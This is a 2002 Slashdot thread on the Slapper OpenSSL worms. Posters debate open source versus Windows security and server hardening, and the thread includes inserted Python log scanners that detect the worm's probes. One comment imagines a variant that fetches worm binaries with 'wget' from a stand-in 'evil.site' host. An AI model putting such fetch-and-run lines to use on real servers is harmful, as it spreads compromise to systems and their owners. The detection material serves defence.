randomErr writes
"The worms, Slapper.B and Slapper.C, which exploit a known buffer overrun vulnerability in the Secure Sockets Layer 2.0 (SSLv2) handshake process, have infected thousands of Web servers worldwide, according to Helsinki-based F-Secure Corp., a computer and network security company."
Finally... (Score:5, Funny)
Laugh, it's a joke
Bravo (Score:2)
Seems like the gloves are coming off. Perhaps we need a sample of this worm to test its DNA and determine its origins
Re:Bravo (Score:2, Insightful)
Yes, just like in the case with Windows.
We're not really catching up (Score:5, Insightful)
Slapper is a minor event. I see a constant stream of Microsoft security alerts go through my mailbox, and you don't hear a peep out of these Microsoft apologists and cheerleaders until a serious Open Source vulnerability occurs once or twice a year.
All complex software will have bugs. It seems to me that Open Source bugs get fixed quicker, and Open Source admins are more inclined to patch in a timely manner than Microsoft ones by at least one order of magnitude. What do you expect from Windows, though, when its target market is people who don't know how to use computers.
Comment removed (Score:4, Interesting)
Re:We're not really catching up (Score:5, Insightful)
More importantly, Open Source problems stay visible until they are fixed. There's no hiding behind STO, no stonewalling.
Have you noticed how many pre-emptive security patches are made by Open Source developers? Where the announcements start with "someone pointed out this security flaw, and they were right, and we wanted to fix it before the exploits get created"? The "someone pointed out" part is a big deal. You can't get that with closed source vendorware, not proactively. As a result, security problems are frequently fixed long before they cause any problems at all.
Re:We're not really catching up (Score:2, Informative)
A few hopes... (Score:5, Funny)
2. Whoever is writing these worms knows how much damage they're doing to open source. It would have been preferable to inform the OpenSSL people first, wait a month, then release the worm.
Of course, by the time you read this, the bug will have been patched.
Re:A few hopes... (Score:3, Insightful)
It would be preferable to let the security at the bank know that you're about to commit armed robbery so they can stop you. Of course there is a difference between white and black hat hackers.
A spacious analogy. (Score:2, Insightful)
Exploiting a vulnerability like this is similar to walking down the alley behind the bank and finding an unlocked door that takes you straight into the vault. Some people (other politics aside such as "who would want to help such a stupid bank!?") would inform the bank, hoping to increase its security. Typically in open source, when we find unlocked doors, we tell the maintainers as soon as possible. It's peer review.
I am not suggesting we do not release exploits though. Worms like this are a good practice run (and a great way of informing the sysadmins they need updates). *shrug*
Retarded:A few hopes... (Score:3, Insightful)
Let me explain the process. You tell me if the analogy fits.
robber:
OpenSSL:
robber:
OpenSSL:
robber:
OpenSSL:
robber:
Re:A few hopes... (Score:5, Insightful)
I'm a bit sad that this has turned into an "open source is STILL better than Windows" thing (even though I think it is). When it comes to security, everybody in the software game has problems. The finger pointing is useless. The lessons of this attack are exactly the same as the lessons of previous attacks, whether on close or open code:
1. Software engineering needs to improve. The exploitable errors are patterns that keep on happening. As a programmer myself, I have made these mistakes. As a trade/guild/profession we need to take the time to learn these patterns and methods to avoid them. We (and I definitely include myself in this) are doing a lousy job.
2. Computer operations are doing a lousy job of keeping systems secure. This one is important, but less important than issue one, because system admins shouldn't have to patch systems constantly. That they have to is more a measure of the failures of software engineering than the failures of system admins. That said, until we programmers get our house in order, it does fall on admins to patch, patch, patch. This sounds simple, but it isn't. When you are talking about mission-critical systems, it is extremely dangerous to apply untested patches to production machines. So dangerous that good admins don't do it. They test patches on their test machines, and well-run systems will go through applications regression testing for each set of patches. This takes time. Time during which the production systems run unpatched. Sometimes these patches come in stochastic bunches such that some patches go unapplied for months, simply because the patch came in after regression testing is too far along to start over. This leads to an ironic situation: The most critical systems to a business are often the most vulnerable. Judgement about whether a patch is for an issue so critical that it should short-circuit regression testing is a difficult art. And what if the production systems don't work after the patch? Sure, you can back up; you might keep your deployments in a CVS-like archive so you can roll back in minutes, but what if even a few minutes is a few hundred thousand dollars, or a few million? How many times can you afford the risk?
One problem with many of my fellow Free Software advocates (note I said "many" and not "all") is that they have not worked in mission-critical production environments in multi-billion dollar enterprises. Many of my fellow Open Source fans have worked in environments where it is no big deal to bring the server down for ten or fifteen minutes. When those are the only kind of shops you have worked in, it is difficult to understand how serious and difficult these issues can be for some.
So don't turn this into a Windows vs. Open Source thing. We (Open Source folks) have to suck it up this time. So what? The issues are the same. Our track record is still better, but, in this situation, the past is meaningless. Where are we now? Unfortunately we are in the same place (and so is the closed world): We are still making the same mistakes in software development and asking the admins to clean up the mess. We are even blaming the admins for it, when it really is not their fault.
All of this was triggered by the previous poster's correct comments about audit and assessment. He/She's right, except that these measures are locking the stable door after the horse has bolted (except sometimes the horse hasn't yet bolted -- that's why you still do it). The problem is we software developers have made a stable door that you can walk away from with it unlocked. If we hadn't done that in the first place...
It is getting better. I'm seeing more books on programming to avoid security problems. We're learning. But there are a lot of us, and we aren't all getting the education.
Re:A few hopes... (Score:5, Informative)
So, in short, it's an old bug, it's been patched, and the only ones getting hit are people who haven't patched their openssl libraries.
Re:A few hopes... (Score:4, Insightful)
Any admin of either platform who uses best practices should be safe from most exploits. Shutdown unused services (and block the ports at your firewall if feasible), keep current on security patches, stay informed, and things should be manageable.
The catch is that just like there are clueless Windows admins, there are clueless Linux admins. And the clueless admins (for either platform) make their platform as a whole look bad.
Re:A few hopes... (Score:2, Insightful)
Re:A few hopes... (Score:3, Insightful)
While it incorporates profanity, and is therefore inherently rude, it isn't always meant or taken that way. There's a reason people write documentation, and it's not for finger exercise. No documentation I ever read was perfect, but most of it answers most questions I have about the application. I see the anagram used more commonly in the form of "DOH! I should have RTFM". It gets used pejoratively towards the people who are too freaking lazy to RTFM. You'd be amazed, for instance, how many people go on a newsgroup for an application, and ask questions that are addressed and answered in the first 25 displayed lines of the man page.
I answer a lot of questions on a newsgroup for a popular utility. On obvious RTFM questions, I always note the questioner's name, domain, and writing style and cut them extra slack if they appear to be non-native speakers of English (technical translation is notoriously tricky). Otherwise, I simply copy/paste in the appropriate few lines of the man page, always including the headers to show where it came from, and introduce it with something like "I could explain in my own words, but I think the author of the man page did a better job than I could."
Here on
In your troll against Linux culture: Somebody who's too lazy or stupid or illiterate to RTFM can't be a decent unix admin, and a sharp, rude reminder of that fact makes the good ones better, and makes the bad ones go back to windows.
Re:A few hopes... (Score:2)
Re:A few hopes... (Score:2)
Re:A few hopes... (Score:2, Interesting)
Most likely they don't give a shit or didn't even consider it. Not everybody is politically motivated. Some people actually see computers as nothing more than a tool, and don't really care if we live in a communist "free" world or a market-driven capitalist one, as long as their computer helps them do what they want to do. It's just a hunk of silicon, steel and plastic - it has no soul, no social conscience and its configuration is no reflection on themselves.
What a revolutionary idea!
Having said that remember that people writing worms are not likely to care much about the effect of their actions, whether it's denying you connectivity or canonizing Bill Gates.
Re:A few hopes... (Score:2)
Maybe these worms come from Microsoft themselves ?
Re: (Score:2)
Re:A few hopes... (Score:5, Funny)
> the OpenSSL people first, wait a month,
> then release the worm.
Dear OpenSSL,
We are about to release an "internet worm" which will wreak havoc on the worldwide "internet" if you don't pay a ransom of... (place little finger on lower lip)
Kind regards,
Dr Evil
Seriously though, I think I'm correct in saying that slapper exploits a flaw in OpenSSL patched well before the first slapper outbreak.
Re:A few hopes... (Score:2, Insightful)
We are about to release an "internet worm" which will wreak havoc on the worldwide "internet" if you don't pay a ransom of... (place little finger on lower lip) ...ONE BILLION DOLLARS!
Kind regards,
Dr Evil
Don't forget to half-close your eyes
Re:A few hopes... (Score:3, Insightful)
Exploit *is* known (Score:2)
Also, while the article makes much of "thousands" of servers compromised, it ignores the fact that the number of compromised servers is (at least last I saw) in the five digits, and pretty much leveled off to very few new infections.
Similar Windows worms (like Code Red) infected hundreds of thousands of machines, and took much longer to level off. Yes, there are still a lot of computers out there, but UNIX admins are a lot more on top of their machines than Win admins, by these numbers.
Re:A few hopes... (Score:2)
I know of many examples, but it's minutes before I leave for work and I cannot cite them. But I'm hoping that you (and many others) are aware that many hackers who have found exploits in Microsoft products do inform Microsoft of the problem before releasing the exploit. Microsoft turn around and ignore them and do nothing until the hacker releases the exploit out into the open. With Microsoft, you don't get anything patched unless it makes a bad PR spin.
One such example of this was the Win32 message system allowing code to elevate its privs by sending commands to higher-priv'ed processes. It was posted to
Re: (Score:2)
use chkrootkit to see if you've gotten it (Score:5, Informative)
version 0.37 has been updated to find the slapper - JB
mirror (Score:2)
Re:mirror (Score:2, Informative)
here is my mirror of the source:
http://sage.che.pitt.edu/~harrold/tmp/ch
Re:mirror (Score:2)
Re:mirror (Score:2)
Re:use chkrootkit to see if you've gotten it (Score:2, Informative)
The most common MD5 sig for the 0.37 tarball seems to be: b0feebea67655daa440da92099dd5187
But for some reason I also see a different MD5 for what is supposed to also be 0.37:
edf50a9c8c6bf09b0a9147f2e6168826
BUT that is actually the signature from 0.35
So the bottom line is, try not to panic. Some mirrors are just a little out of sync. I am still a little nervous running this thing as root since I haven't seen anyone report that it's not a trojan itself. I guess some code review is in order.
Watch for trojans! Use your own binaries! (Score:3, Informative)
It does very little good to check for a rootkit when all the good GNU stuff in /bin has been trojaned...
-B
libsafe ! (Score:5, Informative)
It transparently replaces the libc functions that are the usual targets of stack smashing attacks, and checks whether the stack frame has been overrun. If the stack has been smashed, the process gets terminated forcefully, and root (or other designated contact) gets an e-mail with all the details.
This has been out for several years now, and I am amazed that no major distribution includes this in a standard server install.
-Steve
Linux? (Score:2, Funny)
This shows that Linux+Apache is so widely accepted that it is a legitimate virus target. Enjoy it!
Re:Linux? (Score:2)
This is an apache-modssl-openssl-0.9.6.d-or-earlier-linux-x8
Re:Linux? (Score:3, Insightful)
Re:Linux? (Score:2)
Poor security. (Score:2, Funny)
Oh, what?
Open Source isn't perfect? Everything on Slashdot isn't true?
Maybe I really can leave my Mom's basement, then.
Re:Poor security. (Score:2)
Not quite a complete inverse, since the OpenSSL patch was out very quickly (at least from the OpenSSL people...dunno if all the distros have okayed it, though I know RH (the only one I checked) did some time ago).
Same mantra applies to Linux and MS sysadmins: (Score:5, Informative)
2) Keep up to date on your patch levels.
You don't have to be bleeding-edge on patches, but when a security vulnerability with malicious code in the wild has been detected, it's time to *DO* something about it!
Really, I wonder how many of these infected websites were actually USING SSL, as opposed to having that port hot but unused...
Re:Same mantra applies to Linux and MS sysadmins: (Score:5, Informative)
I would add the following:
3) Don't install a development environment (e.g. gcc, which is required for this worm to propagate) on a publicly exposed web server!
Obviously, this won't work for people with only one box who want to run their personal web server off of it as well as do their dev work there, but for *real* servers this is a good practice. People who must have compilers on their web server are probably not using SSL, as you stated :-).
If you must use a compiler on your web server, FFS run the publicly accessible service in a chroot jail [tldp.org]!
Re:Same mantra applies to Linux and MS sysadmins: (Score:5, Insightful)
Obviously, this won't work for people with only one box who want to run their personal web server off of it as well as do their dev work there, but for *real* servers this is a good practice. People who must have compilers on their web server are probably not using SSL, as you stated :-).
I keep seeing this comment, and every time I think how stupid it is. The compiler is not the security flaw. Given the number of comments like this, I fully expect the next version of this worm to have a "|| wget http://evil.site/worm-`uname -s`-`uname -m`" in place, and evil.site to have statically linked binaries. Then people will be saying "You don't need wget on a production webserver!" or some stupid shit like that. And it will move on to something else. They're already running code on your computer. You're already screwed.
(Isn't the first piece of the exploit written in assembler, as is typical for buffer exploits? Then they have to have targeted your platform specifically anyway. I just don't see why the compiler stage is necessary at all. They can just transfer the larger chunk of worm executable in the same way they transferred the source code.)
The real solution is to secure your system in the first place: disable services you aren't using. Patch ones you are. Given the month between the patch and the exploit, anyone following this practice will be unaffected.
Re:Same mantra applies to Linux and MS sysadmins: (Score:5, Insightful)
It's not stupid at all. You are correct in stating that the compiler is not the security flaw. However, if the compiler were not there, this is the 4th worm in the past few months that you wouldn't have been vulnerable to. Simply because they *could* find other means of implementing the worm doesn't mean that you should make this one easy. There are 2 goals here:
As "stupid" as it may seem from an ivory tower perspective, in practice it helps. It's not a first line of defense, but it helps.
Re:Same mantra applies to Linux and MS sysadmins: (Score:2)
Or in Solaris sysadmin speak, or in redhat sysadmin speak. For instance, solaris tends to run NFS stuffs by default. And Redhat (probably a few other distros too), tend to have a dozen or so unused services running.
Re:Same mantra applies to Linux and MS sysadmins: (Score:2)
Thank you, debian, for apt. Here's how I keep up to date with patches:
Apt is such a great idea. It's a better idea than RHN or whatever it is that mandrake is doing. Why? Because there are a ton of debian developers, each of them only having to watch a relatively small number of packages. And when they keep up with patches, I do too, for almost no work.
This is the beauty of apt - it distributes patch management among a lot of people so that the load of any of them is relatively small. But then it allows all of us to leverage that work. It's distributed AND centralized all in one.
I'm not trying to start a distro war here. I'm just *SOOO* thankful for apt and debian. I'm trying to express gratitude. If it came out as flamebait, it was not intended.
Re:Same mantra applies to Linux and MS sysadmins: (Score:2)
New Mac Users Should Take Note, Too (Score:2)
Thankfully, Apple thought about their security model, so Mac OS X ships with Apache (known in its System Preferences as Personal Web Sharing) and many other common access features switched off by default.
Switching Personal Web Sharing on can make your Mac just as vulnerable to some, if not all of the effects of this worm (if this or any other worm contains x86-specific code for its payload, little to no effect may occur).
Apple's already addressed these vulnerabilities in their recent Security Updates. You can install them from the Software Update system preference or download them from Apple.
Re:Same mantra applies to Linux and MS sysadmins: (Score:2)
That 1) is *extremely* important. If you're running RedHat you can use "chkconfig --list" to see what network-based services are running (all services actually).
For everything you don't know what is, don't hesitate to do a "chkconfig --del [service]". It's not really deleted, just disabled.
Also, do a "rpm -qa" and "rpm -e [package]" for everything you don't know/need. It's better to have to spend some time fixing a problem that you caused yourself than fixing something that was done by an intruder.
The Worm (Score:4, Insightful)
Seems to me like older anti-MS comments are coming around and biting people in the ass.
Re:The Worm (Score:2)
Re:The Worm (Score:5, Insightful)
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
I am the administrator for two Linux servers, a Slackware 7.0 box and a Debian Woody box. I'm scared that I'll get rooted again, but do you know what I'm thinking anyway? "Bring it on." Let these worms propagate, let some publicity get out, and let the patches come. They will come, just as they always have. I'll be a wget %1;upgradepkg %1 or apt-get update;apt-get upgrade away from being back up to speed.
The open-source community, contrary to your assertion, has for years said two things 1) Lazy admins risk getting hacked and 2) Open source patches flow more freely than closed source ones. I don't think the number of holes against NT 4.0 (for example) is criticised, but rather the length of time between exploit and patch-- the criticism is of the number of documented, unpatched holes. If you show me a list of documented, unpatched holes, I'll show you a mailing list / IRC channel / news group that just found a list of things to do for the afternoon. Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows and resort to childish retorts and pleas for silence.
Bring it on, hackers, help us audit the code. Win prestige for you, win a better OS for us.
Re:The Worm (Score:3, Interesting)
The Slashdot community, on the other hand, has for years appended a third comment: we're superior, we're Linux buffs, we're the best, and we apply patches.
Maybe the Slashdot community does. But let's face it -- in the face of this smug and elitist attitude comes the fact that thousands of Linux servers are being compromised because their administrators don't apply patches in a timely fashion. Remember, too, that when the Nimda et al. worms hit, the Slashdot discussions included many regular readers who are also Windows administrators calmly pointing out that they had had no difficulties as they were patched long ago. Interesting, too, to note the (huge generalisation) often calm and mature reaction versus the yelling and screaming and chest-beating reaction of the "see-we-really-are-better-than-you-nyah-nyah-nyah
If you show me a list of documented, unpatched holes, I'll show you a mailing list / IRC channel / news group that just found a list of things to do for the afternoon.
Very valid point. So let me ask you (plural you here) -- when was the last time you spent an afternoon coding, testing, reviewing, and QCing a patch? Maybe you're one of the admirable group who actually does code patches in your spare time. But, more likely, I suspect, is that the vast majority of the readers of this message never have and never will submit a patch.
Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows
I'm sorry, but I couldn't let this one go. The original poster didn't make such a statement. Not even such an inference. The post, instead, merely pointed out the hypocrisy demonstrated by the attitudes described.
And it was correct.
Re:The Worm (Score:2)
My statement: Inexperienced teenagers (a large subset of all teenagers) and newbies are unable to refute your statement that Linux is as bad as Windows
Kiwimate: I'm sorry, but I couldn't let this one go. The original poster didn't make such a statement. Not even such an inference. The post, instead, merely pointed out the hypocrisy demonstrated by the attitudes described.
And it was correct.
If I have misinterpreted CTRamsden's original intent of the statement that, [when faced with vulnerabilities, the open-source community responded with] "Windows still sux..." [paraphrasing, hopefully not too liberally], please forgive me, and I will ask for kiwimate to accept my thanks for pointing out a misinterpretation.
I have seen too many people equate the vocal non-coding, quick to criticise Microsoft Slashdot subgroup as characteristic of the entire open source movement. I think it's very important to remember and recognize that those people are out there -- but equally important to understand that others are out there who accept criticism as constructive.
Re:The Worm (Score:4, Informative)
One thing that would fix a whole lot of problems is for a security model to be installed that allowed root to delegate low-port and raw-protocol access to non-root accounts.
Granted these particular worms would not have cared, but there have been many remote root exploits that happened only because a daemon needed to be root to create a low port or perform raw protocol manipulation.
Questions: (Score:2, Interesting)
> I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.'...
Re:The Worm (Score:2)
I don't think I've *ever* heard anyone say that - certainly not at the local LUG meetings or amongst other fellow users in the area. Maybe it's a Michigan thing, but I can not ever recall hearing or reading comments like that.
Re:The Worm (Score:2)
This virus is not hurting the Linux community. It just shows that there are too few holes for virus writers to be original. The last 3 viruses were using the same one hole. That's more promoting than demoting.
Well, for bad admins. I feel it's ok if they get infected. And for users, they don't have a web server, but if they have, they should click the Update icon sometimes.
Re:The Worm (Score:2)
Hardly. The inability to properly admin a system is biting them in the ass. The comments to Microsoft sucking when it comes to security still apply. When someone says that Linux is more secure than Windows, that is not saying it is perfect. Nobody in their right mind would say that any OS is totally secure. The difference is, it is a Linux community. People who find exploits should alert the community before releasing the information in the wild. The same applies to Windows, Microsoft should be alerted to the problem well before everyone else is. The difference is, the Open Source community will quickly patch it, Microsoft will do whatever they want to do.
There is nothing wrong with yelling at people about keeping their systems up to date. It is just bad practice to not keep up with patches. With Open Source, you can do that - with Windows, you can only do that if Microsoft provides you with patches. The OSS community has absolutely no say in how MS decides to handle vulnerabilities, but we do have a voice in our own community.
And if you think a worm or two means that now Linux is catching up to MS in the number of vulnerabilities, you are living in a dream world. Plagued? Please. At least the OSS community isn't delusional and says "there are no bugs".
Re:The Worm (Score:2)
A missed chance for some bad humor (Score:2, Redundant)
According to researchers at F-Secure, the Slapper.B worm variant is able to retrieve its source code from a Web page after the worm has been removed from infected servers. The worm uses a common free software utility, wget, to retrieve its source code from an infected Web page in the home.ro domain.
Administrators of the domain, which is located in Romania, have been notified and the infected page has been deleted from the site, according to F-Secure.
They should have replaced the code for the worm with code that pops up a window that says "Patch your server, you halfwit!"
CERT Advisory (Score:5, Informative)
what does it look like? (Score:5, Interesting)
your friendly neighborhood AC
Re:what does it look like? (Score:2, Informative)
Anyway I could be completely wrong, but since these hits were from Web servers I kind of suspect that these servers have not been patched.... God I hope that the log entries below don't indicate that I've been hit and damaged
Anyway the hits looked like this:
Re:what does it look like? (Score:3, Informative)
to detect the worm, simply do a ls -al in
you will find
Re:what does it look like? (Score:5, Informative)
[Sun Sep 22 12:45:51 2002] [error] mod_ssl: SSL handshake failed (server YOURSERVER:443, client aaa.bbb.ccc.ddd) (OpenSSL library error follows)
[Sun Sep 22 12:45:51 2002] [error] OpenSSL: error:1406B458:SSL routines:GET_CLIENT_MASTER_KEY:key arg too long
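Added detection example (not from the post, and not F-Secure or CERT tooling): a small Python scanner that walks an Apache error log for the two-line signature quoted above, pairing each mod_ssl handshake failure with the `GET_CLIENT_MASTER_KEY:key arg too long` line that follows it and counting probes per client. The sample log is constructed with documentation-range addresses and an assumed server name.

```python
import re
from collections import Counter

# Line 1 of the pair: mod_ssl reports the failed handshake and names the client.
HANDSHAKE_FAILED = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[error\] mod_ssl: SSL handshake failed "
    r"\(server (?P<server>[^,]+), client (?P<client>[^)]+)\) "
    r"\(OpenSSL library error follows\)$"
)

# Line 2 of the pair: the OpenSSL error that explains why it failed.
OPENSSL_ERROR = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[error\] OpenSSL: error:(?P<code>[0-9A-Fa-f]+):"
    r"SSL routines:(?P<func>[^:]+):(?P<reason>.+)$"
)

# The reason string from the post: an oversized key argument in the SSLv2
# CLIENT-MASTER-KEY message, which is what the Slapper probe trips over.
PROBE_SIGNATURE = ("GET_CLIENT_MASTER_KEY", "key arg too long")


def find_key_arg_probes(lines):
    """Return [(timestamp, client, server)] for every handshake failure that is
    immediately followed by the 'key arg too long' OpenSSL error line."""
    hits = []
    pending = None  # the handshake-failed match waiting for its OpenSSL line
    for raw in lines:
        line = raw.rstrip("\n")
        m = HANDSHAKE_FAILED.match(line)
        if m:
            pending = m
            continue
        m = OPENSSL_ERROR.match(line)
        if m and pending is not None:
            if (m.group("func"), m.group("reason")) == PROBE_SIGNATURE:
                hits.append((pending.group("ts"), pending.group("client"),
                             pending.group("server")))
        pending = None  # any other line breaks the pair
    return hits


def probes_per_client(lines):
    """Count matching probe pairs per client address."""
    return Counter(client for _, client, _ in find_key_arg_probes(lines))


# Constructed sample log: documentation-range addresses and an assumed
# server name, not real traffic. One benign handshake failure is included
# (a plain-HTTP client on port 443) to show it is not counted.
SAMPLE_LOG = """\
[Sun Sep 22 12:45:51 2002] [error] mod_ssl: SSL handshake failed (server www.example.net:443, client 192.0.2.44) (OpenSSL library error follows)
[Sun Sep 22 12:45:51 2002] [error] OpenSSL: error:1406B458:SSL routines:GET_CLIENT_MASTER_KEY:key arg too long
[Sun Sep 22 12:46:02 2002] [error] [client 192.0.2.44] File does not exist: /var/www/html/favicon.ico
[Sun Sep 22 12:47:10 2002] [error] mod_ssl: SSL handshake failed (server www.example.net:443, client 203.0.113.9) (OpenSSL library error follows)
[Sun Sep 22 12:47:10 2002] [error] OpenSSL: error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol
[Sun Sep 22 12:48:33 2002] [error] mod_ssl: SSL handshake failed (server www.example.net:443, client 198.51.100.7) (OpenSSL library error follows)
[Sun Sep 22 12:48:33 2002] [error] OpenSSL: error:1406B458:SSL routines:GET_CLIENT_MASTER_KEY:key arg too long
[Sun Sep 22 12:49:05 2002] [error] mod_ssl: SSL handshake failed (server www.example.net:443, client 192.0.2.44) (OpenSSL library error follows)
[Sun Sep 22 12:49:05 2002] [error] OpenSSL: error:1406B458:SSL routines:GET_CLIENT_MASTER_KEY:key arg too long
"""

if __name__ == "__main__":
    for client, n in probes_per_client(SAMPLE_LOG.splitlines()).most_common():
        print(f"{client}: {n} probe(s)")
```

A handshake failure on its own is noise (ordinary browsers and scanners cause them too); the key-arg reason is what distinguishes this probe. A hit records an attempt against the server, not a successful compromise, so the chkrootkit check mentioned elsewhere in the thread still applies.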
It's a distro problem, not a linux problem (Score:5, Insightful)
IMHO if you need SSL on a webserver, you should be forced to go through the download + build + cert process yourself.
Re:It's a distro problem, not a linux problem (Score:2)
At some point you have to unless you want to run with a phony snakeoil cert.
How to test yourself (Score:5, Informative)
http://cert.uni-stuttgart.de/advisories/openssl
It will connect to your HTTPS server and check it. Unfortunately, it won't connect to SSH. It helped me make sure I was patched up at least for apache.
And I have never quite understood why the advisory says to recompile your apps as well. If they are using the Shared Library, where the problem actually exists, then they get the upgrade by default. Now, if you had some static compiles, then sure.
Pbur
Re:How to test yourself (Score:2)
Re:How to test yourself (Score:3, Informative)
Funny (Score:2)
This time the patch was a month or so too fast for Slapper.B and C. Does this mean that Open Source gets better and better?
p.s. I hate lame unintuitive virus writers without imagination
comparison (Score:4, Insightful)
There are currently an estimated 10,000 hosts infected with Slapper (any variant).
According to DShield's CodeRed history page [dshield.org], around 25,000 windos hosts are still estimated as CodeRed infected, one year after the event.
According to news.com [com.com], at the peak we had over 350,000 infected machines.
10,000 is about 2% of 350,000. No, Slapper is not even comparable to CodeRed when it comes to spread, neither speed nor coverage.
It does, however, prove two things:
a) The Linux world is susceptible to the same generic diseases
b) For various reasons (more variety, better sysadmins, better security in general), it coped much better with an actual outbreak.
Re:comparison (Score:3, Informative)
That said, I would like to see a more in-depth analysis of the proportions of machines which have been hit and are infected. Also, we should bear in mind that the impact is much less on linux as Apache normally runs as a non-root user while IIS almost always runs as a system/admin user.
Re:comparison (Score:2)
You say that like it's a bad thing.
But doesn't that speak to the resilience of the Open Source approach? The fact that you can run an Apache site without enabling or even installing SSL is a strength. AFAIK (and ICBW) you can't do that with IIS.
Reasons (Score:2)
It's called "installed user base".
Re:Reasons (Score:3, Informative)
Even if you double the number to account for people running IIS on their home-desktop, you get nowhere near the "infected-to-unaffected" ratio.
Remember that all the "95% market share" babble is about desktop systems, while both Slapper and CodeRed are targeting server systems, where windos is one among many, and by far not the leader.
Re:Reasons (Score:5, Insightful)
Ah, but it's not an Apache exploit, but an SSLv2 exploit, no? Not every server running Apache is going to be running the SSL stuff as well. So suddenly, it's a bit smaller pool of boxes, and the 'installed base' thing comes back into prominence.
Yup (Score:2)
Re:comparison (Score:4, Informative)
Why? Because of worm propagation history. Slapper is old news by now.
Compare this graph:
http://www.caida.org/analysis/security/code-red/c
It shows that CodeRed's growth was exponential at the critical time, which measured only a few hours. Days have passed since Slapper hit the 10k mark, and we haven't seen any considerably higher estimates.
Old news (Score:2, Informative)
http://www.lwn.net/Articles/10026/
Thanks.
Re:Old news (Score:2)
The entry is as follows:
[Thu Sep 12 17:40:09 2002] [error] [client 211.75.133.54] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23):
I've had a total of about 45 hits in the last 2 weeks, not like nimda at all in that regard (had to nuke my error logs like twice a week instead of once a month).
BWP
(BTW, I'm running FreeBSD and no SSL so it's not that big a deal for me.)
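The error_log entry quoted in the post above is the trace a Slapper probe leaves on a server that does not even have SSL. As an added example (not code from the thread, and not a tool the poster used), here is a small triage script for that log format: it counts the "request without hostname" signature per source IP and per day, and flags any IP that fires the signature several times within a short window, which distinguishes a scanner from a stray misconfigured client. The sample lines other than the one quoted in the post, the 10.0.0.5 address, and the burst parameters are constructed for the example.

```python
"""Triage Apache error_log lines for the probe signature quoted in the post.

Added example for this thread. Assumes the Apache 1.3/2.0 error_log layout
shown above: [timestamp] [level] [client IP] message. Sample lines (apart
from the one quoted in the post) are constructed.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime

# [Thu Sep 12 17:40:09 2002] [error] [client 211.75.133.54] message...
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] \[client (?P<ip>[0-9.]+)\] (?P<msg>.*)$"
)
TS_FORMAT = "%a %b %d %H:%M:%S %Y"
SIGNATURE = "client sent HTTP/1.1 request without hostname"


def parse_line(line):
    """Return a dict for a well-formed error_log line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m.group("ts"), TS_FORMAT),
        "level": m.group("level"),
        "ip": m.group("ip"),
        "msg": m.group("msg"),
    }


def probe_report(lines, burst_window_s=60, burst_threshold=5):
    """Count signature hits per IP and per day; flag IPs that burst.

    An IP is 'bursty' if burst_threshold or more hits fall inside any
    burst_window_s-second window (sliding window over sorted timestamps).
    """
    hits = [r for r in map(parse_line, lines) if r and SIGNATURE in r["msg"]]
    per_ip = Counter(r["ip"] for r in hits)
    per_day = Counter(r["ts"].date().isoformat() for r in hits)

    stamps_by_ip = defaultdict(list)
    for r in hits:
        stamps_by_ip[r["ip"]].append(r["ts"])

    bursty = set()
    for ip, stamps in stamps_by_ip.items():
        stamps.sort()
        lo = 0
        for hi in range(len(stamps)):
            # shrink the window from the left until it spans <= burst_window_s
            while (stamps[hi] - stamps[lo]).total_seconds() > burst_window_s:
                lo += 1
            if hi - lo + 1 >= burst_threshold:
                bursty.add(ip)
                break

    return {
        "total": len(hits),
        "per_ip": dict(per_ip),
        "per_day": dict(per_day),
        "bursty": sorted(bursty),
    }


# Constructed sample: the line from the post, six rapid probes from a
# made-up address, one unrelated error, and one unparseable line.
_SIG = SIGNATURE + " (see RFC2616 section 14.23):"
SAMPLE_LOG = [
    "[Thu Sep 12 17:40:09 2002] [error] [client 211.75.133.54] " + _SIG,
    "[Fri Sep 13 03:10:00 2002] [error] [client 10.0.0.5] " + _SIG,
    "[Fri Sep 13 03:10:04 2002] [error] [client 10.0.0.5] " + _SIG,
    "[Fri Sep 13 03:10:08 2002] [error] [client 10.0.0.5] " + _SIG,
    "[Fri Sep 13 03:10:12 2002] [error] [client 10.0.0.5] " + _SIG,
    "[Fri Sep 13 03:10:16 2002] [error] [client 10.0.0.5] " + _SIG,
    "[Fri Sep 13 03:10:20 2002] [error] [client 10.0.0.5] " + _SIG,
    "[Fri Sep 13 03:11:00 2002] [error] [client 10.0.0.5] File does not exist: /var/www/html/favicon.ico",
    "this line is not an Apache error_log entry",
]

if __name__ == "__main__":
    import json
    print(json.dumps(probe_report(SAMPLE_LOG), indent=2))
```

Run it against a real error_log with `probe_report(open("/var/log/httpd/error_log"))`; the per-day counts give the kind of "45 hits in two weeks" baseline the poster describes, and the burst list is what deserves a second look.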
"Wget"ing its source (Score:5, Interesting)
Rather than simply having deleted the page, I wonder if it would have been possible to replace this source code with something else that acted as an "antibody"?
Re:"Wget"ing its source (Score:3, Funny)
if-down eth0
Backwards (Score:3, Informative)
Perhaps I misread this idea tho?
A false sense of security (Score:4, Interesting)
On the other hand, the administrators of Windows machines, because they are facing a new worm every second day, try to stay up to date with the latest news and patches. Most of them have automatic update wizards running on their machines which download new patches instantly.
In fact I would prefer such an instant update wizard for Linux as well, especially for the Linux running security critical applications, so that even if the system administrator is too lazy to check a news site, he will still come to know about the threat.
And because it will be running on Linux, it will do what it's supposed to do, not "God knows What and Gates knows what" as is the case with the Windows update wizard.
Re:A false sense of security (Score:3, Insightful)
Good post man.
sysadmins? (Score:4, Insightful)
Lots of comments here mention that sysadmins are to be faulted for the spread of this worm. I wonder how many of the infected systems were in fact installed by part-timers who then walked away, or are just being run by newer linux users.
